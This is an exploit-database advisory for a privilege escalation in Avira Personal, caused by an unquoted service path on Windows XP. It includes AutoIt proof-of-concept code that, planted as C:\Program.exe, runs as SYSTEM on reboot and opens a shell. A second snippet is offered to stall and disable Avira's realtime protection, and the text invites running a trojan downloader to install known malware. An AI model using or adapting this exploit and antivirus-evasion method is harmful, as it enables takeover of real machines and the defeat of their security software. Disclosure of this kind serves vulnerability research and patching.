Avira Personal Privilege Escalation Vulnerability



EKU-ID: 3220 CVE: OSVDB-ID:
Author: AkaStep Published: 2013-05-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


============================================
Tested on OS:
Microsoft Windows XP Professional 5.1.2600 Service Pack 2  2600
============================================
Vulnerable Software: Avira Personal
Tested version of Avira:
============================================
Product version 10.2.0.719 25.10.2012
Search engine 8.02.12.38 07.05.2013
Virus definition file 7.11.77.54 08.05.2013
Control Center 10.00.12.31 21.07.2011
Config Center 10.00.13.20 21.07.2011
Luke Filewalker 10.03.00.07 21.07.2011
AntiVir Guard 10.00.01.59 21.07.2011
Filter 10.00.26.09 21.07.2011
AntiVir WebGuard 10.01.09.00 09.05.2011
Scheduler 10.00.00.21 21.04.2011
Updater 10.00.00.39 21.07.2011
============================================
Vulnerability: Privilegie Escalation
============================================


Proof Of concept:
If the attacker somehow manages upload any malicious files to root directory of OS installed disk (%homedrive%) in the following manner:
C:\Program.exe
(In example attacker is limited to execute any file from webserver but is able upload any file to %homedrive%\ )

On next reboot this can be used to escalate privileges to NT_AUTHORITY/SYSTEM due vulnerability in Avira Personal(if that machine uses Avira Personal).
============================================
The main trouble begins from here:

http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425%28v=vs.85%29.aspx

Parameters

lpApplicationName [in, optional]

        c:\program.exe files\sub dir\program name
        c:\program files\sub.exe dir\program name
        c:\program files\sub dir\program.exe name
        c:\program files\sub dir\program name.exe

============================================



For this purposes i have used the following AutoIT script (then compiled it to 32 bit win32 binary)


While 1
  sleep(18000);//sleep for 18 seconds for fun
  MsgBox(64,"","Blah!" & @CRLF & "Woot: We got=>  " & @UserName);//display the current user
  ShellExecute("cmd.exe");//launch cmd.exe
   ;Enjoy
WEnd

and uploaded it as Program.exe to  C:\

Then simply rebooted machine.


Here is result on next reboot:

See escal1.PNG
http://i052.radikal.ru/1305/69/7bb1ce0323ec.png

http://s56.radikal.ru/i152/1305/03/10bc43883c89.png

In eg: this vuln can be used in the following situations:

http://packetstormsecurity.com/files/121168/MiniWeb-File-Upload-Directory-Traversal.html

Attacker is able to upload arbitrary files to system but he/she is unable to execute it.
ON next reboot attacker can escalate privileges to SYSTEM privilegie due vulnerability in Avira Personal.


This is also possible disable Realtime protection(Guard) of Avira personal in the following way on next reboot:


=========================Compile as program.exe and place to %homedrive%\====================
While 1
  sleep(3600*1000);
WEnd
====Start your another troyan downloader and download/execute known malware to Avira==========